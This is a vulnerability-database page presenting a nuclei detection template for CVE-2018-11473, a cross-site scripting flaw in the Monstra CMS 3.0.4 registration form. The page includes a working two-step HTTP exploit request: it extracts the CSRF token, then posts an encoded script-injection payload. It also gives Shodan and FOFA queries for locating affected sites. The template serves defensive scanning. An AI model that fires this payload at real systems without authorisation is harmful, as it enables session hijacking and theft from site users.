Lucene search
K

Monstra CMS 3.0.4 - Cross-Site Scripting

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 49 Views

Monstra CMS 3.0.4 - Cross-Site Scripting vulnerability allows injection of arbitrary script in the registration form, leading to theft of sensitive informatio

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Monstra CMS Cross-Site Scripting Vulnerability (CNVD-2018-15388)
28 May 201800:00
cnvd
CVE
CVE-2018-11473
25 May 201819:00
cve
Cvelist
CVE-2018-11473
25 May 201819:00
cvelist
EUVD
EUVD-2018-3504
7 Oct 202500:30
euvd
NVD
CVE-2018-11473
25 May 201819:29
nvd
OpenVAS
Monstra CMS <= 3.0.4 Multiple Vulnerabilities
29 May 201800:00
openvas
Prion
Design/Logic Flaw
25 May 201819:29
prion
Prion
Design/Logic Flaw
12 Sep 201823:29
prion
RedhatCVE
CVE-2018-16978
22 May 202506:23
redhatcve
id: CVE-2018-11473

info:
  name: Monstra CMS 3.0.4 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Monstra CMS or apply the vendor-provided patch to fix the XSS vulnerability.
  reference:
    - https://github.com/monstra-cms/monstra/issues/446
    - https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page
    - https://nvd.nist.gov/vuln/detail/CVE-2018-11473
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-11473
    cwe-id: CWE-79
    epss-score: 0.02273
    epss-percentile: 0.80891
    cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: monstra
    product: monstra
    shodan-query: http.favicon.hash:419828698
    fofa-query: icon_hash=419828698
  tags: cve,cve2018,xss,mostra,mostracms,cms,monstra,vuln

http:
  - raw:
      - |
        GET /users/registration HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /users/registration HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "><script>alert(document.domain)</script>"
          - "Monstra"
        case-insensitive: true
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'id="csrf" name="csrf" value="(.*)">'
        internal: true
        part: body
# digest: 4b0a004830460221008a6947475751969e8c10e892b1d96356a60b9a2605767464525dc203ccf2a594022100ccb4b56e05c3c7b8a457340591e7dbb04442d7c410c529e5cae994d16ca50c96:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 24.3
CVSS 36.1
EPSS0.02273
49